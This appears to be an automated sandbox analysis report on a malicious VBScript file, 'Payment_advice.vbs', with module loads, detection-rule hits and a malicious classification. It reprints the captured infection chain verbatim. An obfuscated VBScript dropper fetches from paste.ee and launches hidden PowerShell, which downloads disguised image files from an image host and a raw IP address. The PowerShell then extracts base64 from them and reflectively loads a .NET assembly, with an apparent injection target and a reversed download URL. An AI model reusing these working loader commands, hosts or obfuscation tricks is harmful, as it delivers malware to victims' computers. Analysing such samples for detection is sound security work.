Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 4028, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winVBS@6/6@2/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj3moqsy.1x4.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_advice.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_advice.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") espraiado = ("$(@(?(@?@?dig@?@? = '") & palado & "'" espraiado = espraiado & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" espraiado = espraiado & "[??}@*y??}@*" espraiado = espraiado & "t?*(?" espraiado = espraiado & "m.(@(?(@?@?" espraiado = espraiado & "nv?*(?r" espraiado = espraiado & "t]:" espraiado = espraiado & ":Fr@?@?" espraiado = espraiado & "mba??}@*" espraiado = espraiado & "?*(?64??}@*tring( $(@(?(" espraiado = espraiado & "@?@?d" espraiado = espraiado & "ig@?@?.r?*(?" espraiado = espraiado & "@%*:&la" espraiado = espraiado & "(@(?(?*(?('" espraiado = espraiado & "DgTr?*(?" espraiado = espraiado & "','" espraiado = espraiado & "A" espraiado = espraiado & "') ))" espraiado = espraiado & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" espraiado = Replace(espraiado,"@%*:&","p") espraiado = Replace(espraiado,"(@(?(","c") espraiado = Replace(espraiado,"?*(?","e") espraiado = Replace(espraiado,"@?@?","o") espraiado = Replace(espraiado,"??}@*","s") monomaquia1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " monomaquia1 = Replace(monomaquia1,"(@(?(","c") monomaquia1 = Replace(monomaquia1,"??}@*","s") monomaquia1 = Replace(monomaquia1,"@?@?","o") monomaquia1 = Replace(monomaquia1,"@%*:&","p") monomaquia = monomaquia1 & """" & espraiado & """" Cama.Run monomaquia, 0, False IWinHttpRequest.Open("GET", "http://paste.ee/d/wXm0Y", "false");IWinHttpRequest.Send();IWinHttpRequest.ResponseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTre

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreB